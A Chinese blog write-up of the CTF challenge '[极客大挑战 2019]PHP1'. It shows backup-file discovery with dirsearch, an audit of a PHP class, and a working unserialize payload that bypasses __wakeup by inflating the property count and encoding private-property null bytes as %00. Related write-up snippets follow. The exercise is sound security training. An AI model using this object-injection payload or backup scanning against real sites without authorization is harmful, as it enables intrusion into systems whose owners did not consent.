[极客大挑战 2019]PHP1 writeup

已于 2022-04-20 00:35:20 修改
阅读量121 收藏 1
点赞数
文章标签: php
于 2022-04-20 00:34:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dlccom/article/details/124285833
版权
  • 打开网站之后看到个小猫很可爱
  • 右键查看网页源码发现

  • 估计网站会有备份可以扫一下
  • 拿出我的神器dirsearch 调好参数开始扫
  • 果不其然有个备份文件 www.zip

  • 打开文件之后发现是网站备份

  • flag.php里面没货应该是还要从另外两个php文件入手
  • index.php里有一段代码

  • 看到了unserialize 可能考察的是反序列化知识点把
  • 再看一下class.php 
    • <?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest'; //要拿到flag,必须跳过wakeup函数,当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。 
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

  • 代码审计后 发现只要username=admin paswword=100 就可以拿到flga了
  • 故而序列化对象,并将结果输出

  • 结果为"O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}"
  • 绕过wakeu函数需要将表示对象属性个数的值大于真实个数的属性
  • 所以修改后的结果为O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
  • 又因为当private。protected的不可见字符问题,你反序列化的时候,提交的字符串,怎么表示不可见字符呢
  • 一般可以用空格或者%00表示
  • 所以结果为O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
  • 成功ct拿到flag

咸鱼一方
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[挑战 2019]PHP1
陈艺秋的博客
05-27 2382
既然提到了备份网站估计也是存在着网站备份文件,可以先用御剑扫一下啥都没扫出来,但是上回做文件备份的题目时收集了一些关于常用备份文件的文件名和后缀,可以直接使用burp抓包爆破,果然爆破出一个www.zip文件访问下载好文件就有三个php文件,下面进行代码审计。
[挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 2952
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
BUUCTF[挑战 2019]PHP1题解
最新发布
cxm4545的博客
04-26 470
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
[挑战 2019]PHP 1
qq_43618536的博客
07-02 460
BUUCTF的[挑战 2019]PHP 1 反序列化
BUUCTF-[挑战 2019]PHP1
Monica的博客
09-27 3656
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
CTFShow-周末大挑战parse-url篇Writeup
05-19
CTFShow--周末大挑战parse_url篇Writeup
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
2019美亚杯writeup
03-26
2019美亚杯writeup
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup
WriteUp模板1
08-08
WriteUp模板1-文档编写指南 WriteUp模板1是用于编写解题报告的模板,旨在帮助参与校赛的选手编写高质量的解题报告。本文将详细介绍 WriteUp 模板1 的结构和编写要求,帮助选手更好地编写解题报告。 标题 WriteUp ...
[buuoj]挑战 2019]PHP 1
qq_42250840的博客
06-28 1262
知识点: 1、直接扫描目录得到网站源码 2、public、protected与private在序列化时的区别 3、__wakeup()方法绕过 复现: 首先根据提示网站备份文件,考虑扫描备份文件 首先我们需要一个网站备份文件的爆破字典 可以用脚本实现: import sys import imp imp.reload(sys) import os import os.path import requests from urllib.parse import unquote suffixList = ['.
[挑战 2019]PHP
fcz___的博客
03-05 177
然后看了一下才知道用序列化加%00\n在序列化时,Public属性序列化后格式:成员名,Private属性序列化后格式:%00类名%00成员名,Protected属性序列化后的格式:%00*%00成员名。\n但是在对序列化后的数据直接进行复制时会丢失 %00 所以我们对其手动补全,并更改成员属性数目使其大于实际数目那我们就加%00。就是这样:O:4:“Name”:2:{s:14:“Nameusername”;既然他提示我们备份文件,那我们就dirsearch扫描一下目录。我们的右键是不能用的。
[挑战 2019]PHP 1——php反序列化
weixin_51325053的博客
09-12 482
保存,然后获得序列化后的字符串:O:4:“Name”:2:{s:14:“Nameusername”;发现一段php文件,包含class.php文件,用get的方式传入一个select参数,并将结果反序列化(unserialize)我们将用这串序列化的字符串替换select,但问题是,当执行反序列(unserialize)时,会首先执行。在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup(),去执行__destruct。于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,
BUUCTF [挑战 2019]PHP 1
weixin_45642610的博客
01-14 5188
BUUCTF [挑战 2019]PHP 1-刷题日记 进去后是这样: 提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。 py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt -u+地址 -e选择语言 -w选择字典 要多试几次,有时扫不出来,真的坑。(御剑更坑!) 输
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
```php <?php error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] . " "; } else { echo "Upload: " . $_FILES["upload"]["name"] . " "; echo ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值